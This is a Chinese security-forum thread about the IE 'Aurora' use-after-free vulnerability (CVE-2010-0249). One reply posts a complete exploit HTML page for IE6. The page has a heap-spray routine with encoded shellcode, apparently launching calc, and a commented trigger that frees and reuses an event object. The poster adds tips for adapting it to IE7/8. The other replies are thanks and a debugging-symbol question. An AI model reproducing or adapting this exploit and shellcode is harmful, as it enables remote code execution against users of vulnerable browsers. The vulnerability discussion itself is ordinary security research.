[漏洞分析] CVE-2010-0249:(IE AURORA)

CVE-2010-0249: IE EVENTPARAM::EVENTPARAM构造错误导致UAF漏洞(IE AURORA)

CVE-2010-0249.rar (377.21 KB)

一下子扔这么多IE漏洞分析啊,我顶,哈哈

TOP

呵呵,对IE漏洞分析做过一些研究,以后还得向各位大牛多多学习。

TOP


有个疑问:mshtml库中的函数是怎么识别的?为什么我不能定位符号像mshtmlCEventObj::CEventObj?

PS:Windows XP SP3 + IE6. windbg的搜索路径已经设置。


随手丢个质量不高的
  1. <html>
  2. <script>

  3. function heapspray()
  4. {
  5.         var shellcode = unescape("%ue8fc%u0089%u0000%u8960%u31e5%u64d2%u528b%u8b30%u0c52%u528b%u8b14%u2872%ub70f%u264a%uff31%uc031%u3cac%u7c61%u2c02%uc120%u0dcf%uc701%uf0e2%u5752%u528b%u8b10%u3c42%ud001%u408b%u8578%u74c0%u014a%u50d0%u488b%u8b18%u2058%ud301%u3ce3%u8b49%u8b34%ud601%uff31%uc031%uc1ac%u0dcf%uc701%ue038%uf475%u7d03%u3bf8%u247d%ue275%u8b58%u2458%ud301%u8b66%u4b0c%u588b%u011c%u8bd3%u8b04%ud001%u4489%u2424%u5b5b%u5961%u515a%ue0ff%u5f58%u8b5a%ueb12%u5d86%u016a%u858d%u00b9%u0000%u6850%u8b31%u876f%ud5ff%uf0bb%ua2b5%u6856%u95a6%u9dbd%ud5ff%u063c%u0a7c%ufb80%u75e0%ubb05%u1347%u6f72%u006a%uff53%u63d5%u646d%u2f20%u206b%u6163%u636c%u4100");
  6.         var nops = unescape("%u1414%u1414");
  7.         while(nops.length < 0x1000) nops += nops;
  8.        
  9.         var before=nops.substring(0, 0x5F4);
  10.         var end=before+shellcode+nops.substring(0, 0x800 - before.length - shellcode.length);
  11.         while(end.length<0x40000) end += end;
  12.        
  13.         var memory = new Array();
  14.         for(var i=0;i<1000;i++)
  15.         memory[i] = end.substring(0,end.length-0x3);
  16. }
  17. heapspray();
  18. //alert("Heap Spray Ok!");

  19. // Create ~ 200 comments using the randomly selected three character string AAA, will change data later in an attempt to overwrite
  20. var Array1 = new Array();
  21. for (i = 0; i < 200; i++)
  22. {
  23.   Array1[i] = document.createElement("COMMENT");
  24.   Array1[i].data = "AAA";
  25. }

  26. //alert("Create 200 comments ok!");

  27. var Element1 = null;

  28. // Function is called by the onload event of the IMG tag below
  29. // Creates and deletes object, calls the function to overwrite memory
  30. function FRemove(Value1)
  31. {  
  32.   heapspray();
  33.   Element1 = document.createEventObject(Value1); // Create the object of the IMG tag
  34.   document.getElementById("SpanID").innerHTML = ""; // Set parent object to null to trigger heap free()
  35.   window.setInterval(FOverwrite, 50); // Call the overwrite function every 50 ms
  36. }

  37. // Function attempts to overwrite heap memory of deleted object and then access object to trigger crash
  38. function FOverwrite()
  39. {
  40.        
  41.           buffer = unescape("%u1515%u1515");
  42.         /*
  43.         for(i=0;i<4;i++)
  44.         {
  45.                 buffer += unescape("%u1414%u1414");
  46.         }
  47. alert(buffer.length);
  48.         */
  49.         while(buffer.length<10)
  50.         {
  51.                 buffer += unescape("%u1010");
  52.         }
  53.         alert(buffer.length);
  54.   for (i = 0; i < Array1.length; i++)
  55.   {
  56.     Array1[i].data = buffer; // Set comment data to buffer, try to overwrite heap memory of deleted object
  57.   }
  58.   var a = Element1.srcElement; // Access the pointer to the deleted object, trigger crash
  59. }

  60. </script>

  61. <body>
  62. <span id="SpanID"><IMG src="./abcd.gif" onload="FRemove(event)" /></span></body></html>
  63. </body>
  64. </html>
复制代码
exp,只适合IE6,IE7/8/请修改buffer长度。

TOP

真需要样本呢

TOP

学习了                 。

TOP